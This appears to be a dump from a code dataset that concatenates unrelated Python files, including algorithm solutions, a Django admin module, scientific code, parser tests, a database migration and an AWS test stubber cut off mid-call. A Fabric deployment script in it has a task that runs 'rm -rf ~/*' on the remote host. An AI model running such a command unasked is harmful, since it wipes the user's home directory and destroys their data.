content (string, lengths 5 to 1.05M)
n = int(input())
a = list(map(int, input().split()))
sm = sum(a) // (n // 2)  # every pair must sum to this value
l = []
for i in range(n):
    for j in range(i + 1, n):
        # pair i with the first unpaired j that completes the target sum
        # (also check j, so an already-paired index is never reused)
        if a[i] + a[j] == sm and i + 1 not in l and j + 1 not in l:
            l.append(i + 1)
            l.append(j + 1)
            break
for i in range(0, len(l), 2):
    print(l[i], l[i + 1])
from __future__ import ( absolute_import, unicode_literals, ) import re from typing import ( AbstractSet, Any, Dict, List, Mapping, MutableMapping, Tuple, Type, Union, ) from pyparsing import ( And, Literal, MatchFirst, Optional, Or, ParserElement, Regex, White, Word, ) import six from pysoa.test.plan.errors import StatusError ENSURE_ACTION_SUBSTITUTION_DEFAULT_INDEX_RE = re.compile(r'\[\[([A-Z_-]+)\.(?!\d)([a-zA-Z0-9_.{}-]+)*\]\]') VARIABLE_SUBSTITUTION_RE = re.compile(r'(\[\[(([a-zA-Z_-]+\.\d+)?([a-zA-Z0-9_.{}-]+)*)\]\])') SOURCE_PATH_FIND_PATH_WITHOUT_INDEX_TO_ADD_INDEX_ZERO = re.compile(r'^([\w_]+)\.(?!\d+\.)') def path_put(out, path, value): # type: (Union[List, MutableMapping], six.text_type, Any) -> None """ Put data into dict structures based on a string path in the following format: - Dots indicate nested data structures - Numeric path names indicate array indices - Individual path elements that contain dots or which want to be stringified numbers can be escaped by enclosing in {}. Examples: foo.bar.baz => {'foo': {'bar': {'baz': 'value'}}} foo.bar.0 => {'foo': {'bar': [ 'value' ] }}} foo.bar.0.baz => {'foo': {'bar': [ { 'baz': 'value' } ] }}} foo.{bar.baz} => {'foo': {'bar.baz': 'value'}} foo.{0} => {'foo': {'0': 'value'}} """ slot, path_rest = _path_get_next_path_element(path) if path_rest is None: if slot is None: return # Set tip of the branch value (no more recursion at this point) if isinstance(out, list): assert isinstance(slot, int), path _vivify_array(out, slot, dict) out[slot] = value # type: ignore else: next_slot, x = _path_get_next_path_element(path_rest) if next_slot is not None and isinstance(next_slot, int): prototype = [] # type: Union[List, Dict] else: prototype = {} assert slot is not None, path if isinstance(out, MutableMapping) and slot not in out: out[slot] = prototype if isinstance(out, list): assert isinstance(slot, int), path _vivify_array(out, slot, type(prototype)) path_put(out[slot], path_rest, value) # type: ignore def _vivify_array(array, count, prototype): # type: (List, int, Union[Type[List], Type[Mapping]]) -> None for i in range(len(array), count + 1): array.append(prototype()) def path_get(data, path): # type: (Union[Mapping, List, Tuple, AbstractSet], six.text_type) -> Any """ Converse of path_put. Raises `KeyError` or `IndexError` for unaddressable paths. """ slot, path_rest = _path_get_next_path_element(path) assert slot is not None, path if isinstance(data, Mapping) and slot not in data: raise KeyError(slot) if isinstance(data, (list, tuple, AbstractSet)): # do not use Sequence, might cause infinite recursion if not isinstance(slot, int): raise TypeError('{} should be an integer for sequences and sets'.format(slot)) if len(data) < slot + 1: raise IndexError(slot) if isinstance(data, AbstractSet): data = sorted(list(data)) new_data = data[slot] # satisfy MyPy else: new_data = data[slot] # satisfy MyPy if not path_rest: return new_data return path_get(new_data, path_rest) def get_all_paths(data, current_path=''): # type: (Union[Mapping, List, Tuple, AbstractSet], six.text_type) -> List[six.text_type] paths = [] if isinstance(data, Mapping): for k, v in six.iteritems(data): if isinstance(k, six.string_types) and (k.isdigit() or '.' 
in k): k = '{{{}}}'.format(k) paths.extend(get_all_paths(v, _dot_join(current_path, k))) elif isinstance(data, (list, tuple, AbstractSet)): # do not use Sequence, definitely causes infinite recursion if isinstance(data, AbstractSet): data = sorted(list(data)) for i, v in enumerate(data): paths.extend(get_all_paths(v, _dot_join(current_path, i))) else: return [current_path] return paths def _dot_join(a, b): # type: (six.text_type, Union[six.text_type, int]) -> six.text_type if not a: return six.text_type(b) return '.'.join([six.text_type(a), six.text_type(b)]) def _path_get_next_path_element(path): # type: (six.text_type) -> Union[Tuple[None, None], Tuple[Union[six.text_type, int], Union[six.text_type, None]]] # returns next path element and path remainder # # This is what happens when you don't really think ahead on your language. # # Supported formats: # 1) 'dot' delimited # 2) Integer string values will be cast to int unless "escaped." # 3) Values between dots can be "escaped" by enclosing in curly braces. Anything inside the braces will be # taken "as is", but extra curlies inside the escaped value must balance. # # foo => foo # foo.bar => foo, bar # foo.bar.0 => foo, bar, int(0) # foo.bar.0.baz => foo, bar, int(0), baz # foo.{bar.0.baz} => foo, bar.0.baz # foo.{0}.bar => foo, six.text_type(0), bar # foo.{{bar.baz}}.qux => foo, {bar.baz}, qux # if not path: return None, None next_element_chars = [] brace = 0 was_in_brace = False i = 0 for i, char in enumerate(path): if char == '{': was_in_brace = True brace += 1 if brace == 1: continue if char == '}': brace -= 1 if brace == 0: continue if char == '.' and not brace: break next_element_chars.append(char) next_element = ''.join(next_element_chars) next_element_final = next_element # type: Union[six.text_type, int] if not was_in_brace and next_element.isdigit(): next_element_final = int(next_element) remainder = path[i + 1:] or None return next_element_final, remainder # noinspection PyUnresolvedReferences def recursive_parse_expr_repr(parse_expression): # type: (ParserElement) -> six.text_type """ Return a reasonable BNF(ish) style representation of a parse_expression. """ if isinstance(parse_expression, And): return ' '.join([recursive_parse_expr_repr(x) for x in parse_expression.exprs]) if isinstance(parse_expression, Optional): if isinstance(parse_expression.expr, White): return '' else: return ''.join(('[', recursive_parse_expr_repr(parse_expression.expr), ']')) if isinstance(parse_expression, (MatchFirst, Or)): return '(({}))'.format(') | ('.join([recursive_parse_expr_repr(x) for x in parse_expression.exprs])) if isinstance(parse_expression, White): return '' if isinstance(parse_expression, Literal): return "'{}'".format(parse_expression.match) if isinstance(parse_expression, Word): return parse_expression.resultsName or parse_expression.name if isinstance(parse_expression, Regex): if parse_expression.resultsName: return parse_expression.resultsName else: return repr(parse_expression) return '' def substitute_variables(data, *sources): # type: (Union[MutableMapping, List], *Union[Mapping, List, Tuple, AbstractSet]) -> None """ Overlay [[NAME]] values with values from sources, if possible. 
""" for path in get_all_paths(data): try: value = path_get(data, path) except (KeyError, IndexError): continue if not value: continue if not isinstance(value, six.text_type): continue replacements = [ {'token': m[0], 'full_path': m[1], 'action': m[2], 'action_path': m[3] if m[2] else None} for m in VARIABLE_SUBSTITUTION_RE.findall(value) ] if not replacements: continue for replacement in replacements: find_path = replacement['full_path'] if replacement['action']: potential_action_name = replacement['action'].lower() for source in sources: if potential_action_name in source: # `action.#` paths don't denote a sublist, unlike most path expressions ... instead, the # entire `action.#` value is a key in a dict, so we need to escape it. The result is # `{action.#}.rest.of.path`. find_path = '{{{}}}{}'.format(potential_action_name, replacement['action_path']) try: replace_with = _find_path_in_sources(find_path, *sources) except KeyError: raise StatusError('Could not find value {path} for {replacement} in sources {sources}'.format( path=find_path, replacement=replacement['token'], sources=sources, )) if value == replacement['token']: # preserve the type if this is the only replacement in the value value = replace_with else: value = value.replace(replacement['token'], six.text_type(replace_with)) path_put(data, path, value) def _find_path_in_sources(source_path, *sources): # type: (six.text_type, *Union[Mapping, List, Tuple, AbstractSet]) -> Any for source in sources: try: return path_get(source, source_path) except (KeyError, IndexError): try: return path_get(source, source_path.lower()) except (KeyError, IndexError): try: return path_get( source, SOURCE_PATH_FIND_PATH_WITHOUT_INDEX_TO_ADD_INDEX_ZERO.sub(r'{\1.0}.', source_path.lower()) ) except (KeyError, IndexError): pass raise KeyError(source_path)
import collections
from typing import List


class Solution:
    def findJudge(self, n: int, trust: List[List[int]]) -> int:
        """
        Approach:
        1. Decrease trust for person1 and increase trust for person2.
        2. If there is a judge, their trust count must equal n - 1 (everyone except the judge).
        Time complexity O(N)
        Space complexity O(N)
        """
        trust_count = collections.Counter()
        for person1, person2 in trust:
            trust_count[person2] += 1
            trust_count[person1] -= 1
        for judge, count in trust_count.items():
            if count == n - 1:
                return judge
        return n if n == 1 else -1
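A quick usage check for the judge-finding approach documented above (the example trust lists are illustrative, not taken from the original file):

# person 3 is trusted by the other n - 1 = 2 people and trusts nobody
sol = Solution()
assert sol.findJudge(3, [[1, 3], [2, 3]]) == 3
assert sol.findJudge(1, []) == 1                  # a lone person is trivially the judge
assert sol.findJudge(2, [[1, 2], [2, 1]]) == -1   # mutual trust means no judge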
from django.contrib import admin from metaci.repository.models import Branch from metaci.repository.models import Repository from metaci.plan.models import PlanRepository class BranchAdmin(admin.ModelAdmin): list_display = ("repo", "name") admin.site.register(Branch, BranchAdmin) class PlanRepositoryInline(admin.TabularInline): model = PlanRepository class RepositoryAdmin(admin.ModelAdmin): list_display = ("name", "owner") inlines = [PlanRepositoryInline] admin.site.register(Repository, RepositoryAdmin)
from fabric.api import *


def Install():
    run('git clone https://github.com/JotaGalera/FindAInformatic')
    with cd("~/FindAInformatic/"):
        run('make')


def Start():
    with cd("~/FindAInformatic/"):
        run('sudo gunicorn --bind 0.0.0.0:80 application:app')
        run('pgrep gunicorn > ~/id.txt')  # so we keep track of which gunicorn is ours


def Stop():
    # Read the PID of our gunicorn and kill it; done in a single run() call,
    # since each run() opens its own shell and variables do not persist between calls
    run('sudo kill $(head -1 ~/id.txt)')


def RemoveAll():
    run(' rm -rf ~/* ')
import torch import torch.nn as nn import torch.nn.functional as F import gc import time import json import sys import gc import numpy as np import os from datetime import datetime import pytorch3d from pytorch3d.structures import Meshes from pytorch3d.io import load_obj from pytorch3d.ops import sample_points_from_meshes from pytorch3d.loss import ( chamfer_distance, ) from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt import matplotlib as mpl #demo_length = 30 demo_length = 50 #demo_length = 45 #demo_length = 50 step = 1 out_dir = 'demo_pcl_frames' num_points = 5000 def plot_pointcloud(points, title=""): x, z, y = points.clone().detach().cpu().squeeze().unbind(1) fig = plt.figure(figsize=(5, 5)) ax = Axes3D(fig) ax.scatter3D(x, z, y, s=0.15) ax.set_xlabel('x') ax.set_ylabel('z') ax.set_zlabel('y') ax.set_title(title) ax.view_init(100, -60) #plt.savefig(title) #plt.clf() plt.show() def sim_objs_to_pcls(sim_dir='default_out'): if not os.path.exists(out_dir): os.mkdir(out_dir) for i in range(0, demo_length, step): mesh_fnames = sorted([f for f in os.listdir('%s/out0'%sim_dir) if '%04d'%i in f]) all_verts = [] all_faces = [] vert_count = 0 for j, f in enumerate(mesh_fnames[:1] + mesh_fnames[2:]): #for j, f in enumerate(mesh_fnames): #for j, f in enumerate(mesh_fnames[:1]): verts, faces, aux = load_obj(os.path.join(sim_dir, "out0", f)) faces_idx = faces.verts_idx + vert_count verts = verts vert_count += len(verts) all_verts.append(verts) all_faces.append(faces_idx) mesh = Meshes(verts=[torch.cat(all_verts)], faces=[torch.cat(all_faces)]) sample_pcl = sample_points_from_meshes(mesh, num_points) np.save(os.path.join(out_dir, '%03d.npy'%i), sample_pcl) #plot_pointcloud(sample_pcl) #break if __name__ == '__main__': sim_objs_to_pcls()
"""CLI scripts."""
# -*- coding: utf-8 -*- """ .. moduleauthor:: Mark Hall <mark.hall@mail.room3b.eu> """ from csv import DictReader from io import TextIOWrapper from nose.tools import eq_ from pkg_resources import resource_stream def full_test(): reader = DictReader(TextIOWrapper(resource_stream('pycaptioner', 'test/data/points.csv'))) for line in reader: print (line)
from day11 import part1, part2 test_input = """5483143223 2745854711 5264556173 6141336146 6357385478 4167524645 2176841721 6882881134 4846848554 5283751526""".splitlines() def test_part1(): assert part1(test_input) == 1656 def test_part2(): assert part2(test_input) == 195
from SimPEG import Utils, np from scipy.constants import mu_0, epsilon_0 from SimPEG.EM.Utils.EMUtils import k def getKc(freq,sigma,a,b,mu=mu_0,eps=epsilon_0): a = float(a) b = float(b) # return 1./(2*np.pi) * np.sqrt(b / a) * np.exp(-1j*k(freq,sigma,mu,eps)*(b-a)) return np.sqrt(b / a) * np.exp(-1j*k(freq,sigma,mu,eps)*(b-a)) def _r2(xyz): return np.sum(xyz**2,1) def _getCasingHertzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): Kc1 = getKc(freq,sigma[1],a,b,mu[1],eps) nobs = obsloc.shape[0] dxyz = obsloc - np.c_[np.ones(nobs)]*np.r_[srcloc] r2 = _r2(dxyz[:,:2]) sqrtr2z2 = np.sqrt(r2 + dxyz[:,2]**2) k2 = k(freq,sigma[2],mu[2],eps) return Kc1 * moment / (4.*np.pi) *np.exp(-1j*k2*sqrtr2z2) / sqrtr2z2 def _getCasingHertzMagDipoleDeriv_r(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): HertzZ = _getCasingHertzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) nobs = obsloc.shape[0] dxyz = obsloc - np.c_[np.ones(nobs)]*np.r_[srcloc] r2 = _r2(dxyz[:,:2]) sqrtr2z2 = np.sqrt(r2 + dxyz[:,2]**2) k2 = k(freq,sigma[2],mu[2],eps) return -HertzZ * np.sqrt(r2) / sqrtr2z2 * (1j*k2 + 1./ sqrtr2z2) def _getCasingHertzMagDipoleDeriv_z(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): HertzZ = _getCasingHertzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) nobs = obsloc.shape[0] dxyz = obsloc - np.c_[np.ones(nobs)]*np.r_[srcloc] r2z2 = _r2(dxyz) sqrtr2z2 = np.sqrt(r2z2) k2 = k(freq,sigma[2],mu[2],eps) return -HertzZ*dxyz[:,2] /sqrtr2z2 * (1j*k2 + 1./sqrtr2z2) def _getCasingHertzMagDipole2Deriv_z_r(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): HertzZ = _getCasingHertzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) dHertzZdr = _getCasingHertzMagDipoleDeriv_r(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) nobs = obsloc.shape[0] dxyz = obsloc - np.c_[np.ones(nobs)]*np.r_[srcloc] r2 = _r2(dxyz[:,:2]) r = np.sqrt(r2) z = dxyz[:,2] sqrtr2z2 = np.sqrt(r2 + z**2) k2 = k(freq,sigma[2],mu[2],eps) return dHertzZdr*(-z/sqrtr2z2)*(1j*k2+1./sqrtr2z2) + HertzZ*(z*r/sqrtr2z2**3)*(1j*k2 + 2./sqrtr2z2) def _getCasingHertzMagDipole2Deriv_z_z(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): HertzZ = _getCasingHertzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) dHertzZdz = _getCasingHertzMagDipoleDeriv_z(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) nobs = obsloc.shape[0] dxyz = obsloc - np.c_[np.ones(nobs)]*np.r_[srcloc] r2 = _r2(dxyz[:,:2]) r = np.sqrt(r2) z = dxyz[:,2] sqrtr2z2 = np.sqrt(r2 + z**2) k2 = k(freq,sigma[2],mu[2],eps) return (dHertzZdz*z + HertzZ)/sqrtr2z2*(-1j*k2 - 1./sqrtr2z2) + HertzZ*z/sqrtr2z2**3*(1j*k2*z + 2.*z/sqrtr2z2) def getCasingEphiMagDipole(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): return 1j * omega(freq) * mu * _getCasingHertzMagDipoleDeriv_r(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) def getCasingHrMagDipole(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): return _getCasingHertzMagDipole2Deriv_z_r(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) def getCasingHzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): d2HertzZdz2 = _getCasingHertzMagDipole2Deriv_z_z(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) k2 = k(freq,sigma[2],mu[2],eps) HertzZ = _getCasingHertzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) return d2HertzZdz2 + k2**2 * HertzZ def getCasingBrMagDipole(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): return mu_0 * 
getCasingHrMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) def getCasingBzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): return mu_0 * getCasingHzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment)
'''
Given numRows, generate the first numRows of Pascal's triangle.

For example, given numRows = 5,
Return
[
     [1],
    [1,1],
   [1,2,1],
  [1,3,3,1],
 [1,4,6,4,1]
]

This is clearly a dynamic-programming problem. There are also some clever
tricks, for example:
  1 3 3 1 0
+ 0 1 3 3 1
= 1 4 6 4 1
'''


class Solution:
    def generate(self, numRows):
        """
        :type numRows: int
        :rtype: List[List[int]]
        """
        nums = []
        for i in range(numRows):
            if i == 0:
                nums.append([1])
                continue
            if i == 1:
                nums.append([1, 1])
                continue
            temp = [1]
            for j in range(len(nums[i - 1]) - 1):
                temp.append(nums[i - 1][j] + nums[i - 1][j + 1])
            temp.append(1)
            nums.append(temp)
        return nums
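A minimal sketch of the "shift and add" trick mentioned in the docstring above, shown as a hypothetical alternative to the row-by-row loop (the function name is illustrative and not part of the original solution):

def generate_shift_add(num_rows):
    rows = []
    row = [1]
    for _ in range(num_rows):
        rows.append(row)
        # e.g. [1,3,3,1,0] + [0,1,3,3,1] summed element-wise gives [1,4,6,4,1]
        row = [a + b for a, b in zip(row + [0], [0] + row)]
    return rows

# generate_shift_add(5) -> [[1], [1, 1], [1, 2, 1], [1, 3, 3, 1], [1, 4, 6, 4, 1]]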
import unittest from cnc.gcode import * class TestGCode(unittest.TestCase): def setUp(self): self.default = Coordinates(-7, 8, 9, -10) def tearDown(self): pass def test_constructor(self): # GCode shouldn't be created with constructor, but since it uses # internally, let's check it. self.assertRaises(TypeError, GCode) gc = GCode({"X": "1", "Y": "-2", "Z": "0", "E": 99, "G": "1"}) self.assertEqual(gc.coordinates(self.default, 1).x, 1.0) self.assertEqual(gc.coordinates(self.default, 1).y, -2.0) self.assertEqual(gc.coordinates(self.default, 1).z, 0.0) self.assertEqual(gc.coordinates(self.default, 1).e, 99.0) def test_has(self): gc = GCode.parse_line("g1X2Y3z4E5F50") self.assertTrue(gc.has("G")) self.assertTrue(gc.has("X")) self.assertTrue(gc.has("Y")) self.assertTrue(gc.has("Z")) self.assertTrue(gc.has("E")) self.assertTrue(gc.has("F")) def test_parser(self): gc = GCode.parse_line("G1X2Y-3Z4E1.5") self.assertEqual(gc.command(), "G1") self.assertEqual(gc.coordinates(self.default, 1).x, 2.0) self.assertEqual(gc.coordinates(self.default, 1).y, -3.0) self.assertEqual(gc.coordinates(self.default, 1).z, 4.0) self.assertEqual(gc.coordinates(self.default, 1).e, 1.5) gc = GCode.parse_line("") self.assertIsNone(gc) def test_defaults(self): # defaults are values which should be returned if corresponding # value doesn't exist in gcode. default = Coordinates(11, -12, 14, -10) gc = GCode.parse_line("G1") self.assertEqual(gc.coordinates(default, 1).x, 11.0) self.assertEqual(gc.coordinates(default, 1).y, -12.0) self.assertEqual(gc.coordinates(default, 1).z, 14.0) self.assertEqual(gc.coordinates(default, 1).e, -10.0) def test_commands(self): gc = GCode({"G": "1"}) self.assertEqual(gc.command(), "G1") gc = GCode.parse_line("M99") self.assertEqual(gc.command(), "M99") def test_case_sensitivity(self): gc = GCode.parse_line("m111") self.assertEqual(gc.command(), "M111") gc = GCode.parse_line("g2X3y-4Z5e6") self.assertEqual(gc.command(), "G2") self.assertEqual(gc.coordinates(self.default, 1).x, 3.0) self.assertEqual(gc.coordinates(self.default, 1).y, -4.0) self.assertEqual(gc.coordinates(self.default, 1).z, 5.0) self.assertEqual(gc.coordinates(self.default, 1).e, 6.0) def test_has_coordinates(self): gc = GCode.parse_line("X2Y-3Z4") self.assertTrue(gc.has_coordinates()) gc = GCode.parse_line("G1") self.assertFalse(gc.has_coordinates()) gc = GCode.parse_line("X1") self.assertTrue(gc.has_coordinates()) gc = GCode.parse_line("Y1") self.assertTrue(gc.has_coordinates()) gc = GCode.parse_line("Z1") self.assertTrue(gc.has_coordinates()) gc = GCode.parse_line("E1") self.assertTrue(gc.has_coordinates()) def test_radius(self): gc = GCode.parse_line("G2I1J2K3") self.assertEqual(gc.radius(self.default, 1).x, 1) self.assertEqual(gc.radius(self.default, 1).y, 2) self.assertEqual(gc.radius(self.default, 1).z, 3) gc = GCode.parse_line("G3") self.assertEqual(gc.radius(self.default, 1).x, self.default.x) self.assertEqual(gc.radius(self.default, 1).y, self.default.y) self.assertEqual(gc.radius(self.default, 1).z, self.default.z) def test_multiply(self): # getting coordinates could modify value be specified multiplier. 
gc = GCode.parse_line("X2 Y-3 Z4 E5") self.assertEqual(gc.coordinates(self.default, 25.4).x, 50.8) self.assertEqual(gc.coordinates(self.default, 2).y, -6) self.assertEqual(gc.coordinates(self.default, 0).y, 0) self.assertEqual(gc.coordinates(self.default, 5).e, 25) def test_whitespaces(self): gc = GCode.parse_line("X1 Y2") self.assertEqual(gc.coordinates(self.default, 1).x, 1.0) self.assertEqual(gc.coordinates(self.default, 1).y, 2.0) gc = GCode.parse_line("X 3 Y4") self.assertEqual(gc.coordinates(self.default, 1).x, 3.0) self.assertEqual(gc.coordinates(self.default, 1).y, 4.0) gc = GCode.parse_line("X 5 Y\t 6") self.assertEqual(gc.coordinates(self.default, 1).x, 5.0) self.assertEqual(gc.coordinates(self.default, 1).y, 6.0) gc = GCode.parse_line(" \tX\t\t \t\t7\t ") self.assertEqual(gc.coordinates(self.default, 1).x, 7.0) def test_errors(self): self.assertRaises(GCodeException, GCode.parse_line, "X1X1") self.assertRaises(GCodeException, GCode.parse_line, "X1+Y1") self.assertRaises(GCodeException, GCode.parse_line, "X1-Y1") self.assertRaises(GCodeException, GCode.parse_line, "~Y1") self.assertRaises(GCodeException, GCode.parse_line, "Y") self.assertRaises(GCodeException, GCode.parse_line, "abracadabra") self.assertRaises(GCodeException, GCode.parse_line, "G1M1") self.assertRaises(GCodeException, GCode.parse_line, "x 1 y 1 z 1 X 1") def test_comments(self): self.assertIsNone(GCode.parse_line("; some text")) self.assertIsNone(GCode.parse_line(" \t \t ; some text")) self.assertIsNone(GCode.parse_line("(another comment)")) gc = GCode.parse_line("X2.5 ; end of line comment") self.assertEqual(gc.coordinates(self.default, 1).x, 2.5) gc = GCode.parse_line("X2 Y(inline comment)7") self.assertEqual(gc.coordinates(self.default, 1).x, 2.0) self.assertEqual(gc.coordinates(self.default, 1).y, 7.0) gc = GCode.parse_line("X2 Y(inline comment)3 \t(one more comment) " "\tz4 ; multi comment test") self.assertEqual(gc.coordinates(self.default, 1).x, 2.0) self.assertEqual(gc.coordinates(self.default, 1).y, 3.0) self.assertEqual(gc.coordinates(self.default, 1).z, 4.0) if __name__ == '__main__': unittest.main()
import tvm import tvm.micro def targetIsARM(target): return target.attrs["mcpu"] == "armv6-m" def targetIsRISCV(target): return target.attrs["mcpu"] == "rv32gc" class Compiler_Ext(tvm.micro.DefaultCompiler): def _autodetect_toolchain_prefix(self, target): if targetIsARM(target): return "arm-none-eabi-" if targetIsRISCV(target): return "/usr/local/research/projects/SystemDesign/tools/riscv/current/bin/riscv64-unknown-elf-" return super(Compiler_Ext, self)._autodetect_toolchain_prefix(target) def _defaults_from_target(self, target): opts = super(Compiler_Ext, self)._defaults_from_target(target) if targetIsARM(target): opts = [opt.replace("mcpu", "march") for opt in opts] opts.append("-mthumb") opts.append("--specs=nosys.specs") if targetIsRISCV(target): opts = [opt.replace("mcpu", "march") for opt in opts] opts.append("-mabi=ilp32d") return opts
""" # test_config_gunicorn """ import logging import unittest import mock import ml.config_gunicorn as config_gunicorn class ConfigGunicornTester(unittest.TestCase): """ ConfigGunicornTester includes all unit tests for ml.config_gunicorn module """ @classmethod def teardown_class(cls): logging.shutdown() def setUp(self): """setup for test""" pass def tearDown(self): """tearing down at the end of the test""" pass def test_config(self): self.assertEqual(config_gunicorn.worker_class, 'sync') self.assertTrue(config_gunicorn.workers >= 1) def test_hooks(self): environ = mock.MagicMock() new_value = mock.MagicMock() old_value = mock.MagicMock() req = mock.MagicMock() server = mock.MagicMock() worker = mock.MagicMock() resp = mock.MagicMock() config_gunicorn.nworkers_changed(server, new_value, old_value) config_gunicorn.on_exit(server) config_gunicorn.on_reload(server) config_gunicorn.on_starting(server) config_gunicorn.post_fork(server, worker) config_gunicorn.post_request(worker, req, environ, resp) config_gunicorn.post_worker_init(worker) config_gunicorn.pre_exec(server) config_gunicorn.pre_fork(server, worker) config_gunicorn.pre_request(worker, req) config_gunicorn.when_ready(server) config_gunicorn.worker_abort(worker) config_gunicorn.worker_exit(server, worker) config_gunicorn.worker_init(worker)
import heapq from collections import deque from typing import List class Solution1: def max_result(self, nums: List[int], k: int) -> int: q = deque(([(0, nums[0])])) ret = nums[0] for i in range(1, len(nums)): while q and q[-1][0] < (i - k): q.pop() ret = nums[i] + q[-1][1] while q and q[0][1] < ret: q.popleft() q.appendleft((i, ret)) return ret class Solution2: def max_result(self, nums, k): h = [(-nums[0], 0)] ret = nums[0] for i in range(1, len(nums)): while h and h[0][1] < (i-k): heapq.heappop(h) ret = -h[0][0] + nums[i] heapq.heappush(h, (-ret, i)) return ret
import copy from cumulusci.robotframework import locators_52 lex_locators = copy.deepcopy(locators_52.lex_locators) lex_locators["object_list"] = { # Note: this matches the <td> with the checkbutton, not the inner checkbutton # This is because clicking the actual checkbutton will throw an error that # another element will receive the click. "checkbutton": '//tbody/tr[.//*[text()="{}"]]//td[.//input[@type="checkbox"]]', "status_info": "//force-list-view-manager-status-info", }
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import json from netests.constants import NOT_SET as NSET from netests.protocols.lldp import LLDP, ListLLDP def _napalm_lldp_converter( hostname: str(), cmd_output: json, options={} ) -> ListLLDP: lldp_neighbors_lst = ListLLDP( lldp_neighbors_lst=list() ) if not isinstance(cmd_output, dict): cmd_output = json.loads(cmd_output) if 'get_lldp_neighbors_detail' in cmd_output.keys(): for i, f in cmd_output.get('get_lldp_neighbors_detail').items(): for n in f: lldp_neighbors_lst.lldp_neighbors_lst.append( LLDP( local_name=hostname, local_port=i, neighbor_mgmt_ip=NSET, neighbor_name=n.get("remote_system_name", NSET), neighbor_port=n.get("remote_port"), neighbor_os=n.get("remote_system_description", NSET), neighbor_type=n.get("remote_system_capab", NSET), options=options ) ) return lldp_neighbors_lst
from __future__ import absolute_import from dataverse.settings.defaults import * # noqa try: from dataverse.settings.local import * # noqa except ImportError as error: pass
"""An example of unit tests based on pytest.""" from .demo import add def test_add() -> None: """Test add.""" assert add([1, 2, 3]) == 6
"""seed databases and allow nullable password_hash Revision ID: 5818f4679595 Revises: 4b61e9319ad9 Create Date: 2021-09-08 14:27:33.384835 """ from alembic import op import sqlalchemy as sa from datetime import datetime import uuid # revision identifiers, used by Alembic. revision = "5818f4679595" down_revision = "4b61e9319ad9" branch_labels = None depends_on = None def upgrade(): meta = sa.MetaData(bind=op.get_bind()) meta.reflect(only=("organisations", "scan_types", "users")) organisations = sa.Table("organisations", meta) scan_types = sa.Table("scan_types", meta) op.alter_column("users", "password_hash", nullable=True) op.bulk_insert( organisations, [ { "id": str(uuid.uuid4()), "name": "Canadian Digital Service - Service Numérique Canadien", "created_at": datetime.now(), "updated_at": datetime.now(), } ], ) op.bulk_insert( scan_types, [ { "id": str(uuid.uuid4()), "name": "axe-core", "created_at": datetime.now(), "updated_at": datetime.now(), }, { "id": str(uuid.uuid4()), "name": "OWASP Zap", "created_at": datetime.now(), "updated_at": datetime.now(), }, ], ) def downgrade(): op.execute("UPDATE users SET password_hash = '' WHERE password_hash IS NULL") op.alter_column("users", "password_hash", nullable=False) op.execute( """ DELETE FROM users; DELETE FROM a11y_violations; DELETE FROM a11y_reports; DELETE FROM scans; DELETE FROM template_scan_triggers; DELETE FROM template_scans; DELETE FROM templates; DELETE FROM "organisations" WHERE name = 'Canadian Digital Service - Service Numérique Canadien'; """ ) op.execute("""DELETE FROM "scan_types" WHERE name = 'axe-core'; """) op.execute("""DELETE FROM "scan_types" WHERE name = 'OWASP Zap'; """)
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # SPDX-License-Identifier: Apache-2.0 """ Stub functions that are used by the AWS Organizations unit tests. When tests are run against an actual AWS account, the stubber class does not set up stubs and passes all calls through to the Boto3 client. """ import json from test_tools.example_stubber import ExampleStubber class OrganizationsStubber(ExampleStubber): """ A class that implements a variety of stub functions that are used by the AWS Organizations unit tests. The stubbed functions all expect certain parameters to be passed to them as part of the tests, and will raise errors when the actual parameters differ from the expected. """ def __init__(self, client, use_stubs=True): """ Initializes the object with a specific client and configures it for stubbing or AWS passthrough. :param client: A Boto3 Organizations client. :param use_stubs: When True, use stubs to intercept requests. Otherwise, pass requests through to AWS. """ super().__init__(client, use_stubs) @staticmethod def _make_policy_summary(policy): return { 'Id': policy['id'], 'Arn': f'arn:aws:organizations::111111111111:policy/{policy["name"]}', 'Name': policy['name'], 'Description': policy['description'], 'Type': policy['type'], 'AwsManaged': False } def stub_create_policy(self, policy, error_code=None): expected_parameters = { 'Name': policy['name'], 'Description': policy['description'], 'Content': json.dumps(policy['content']), 'Type': policy['type'] } response = {'Policy': { 'PolicySummary': self._make_policy_summary(policy), 'Content': json.dumps(policy['content']) }} self._stub_bifurcator( 'create_policy', expected_parameters, response, error_code=error_code) def stub_list_policies(self, policy_filter, policies, error_code=None): expected_parameters = {'Filter': policy_filter} response = {'Policies': [self._make_policy_summary(pol) for pol in policies]} self._stub_bifurcator( 'list_policies', expected_parameters, response, 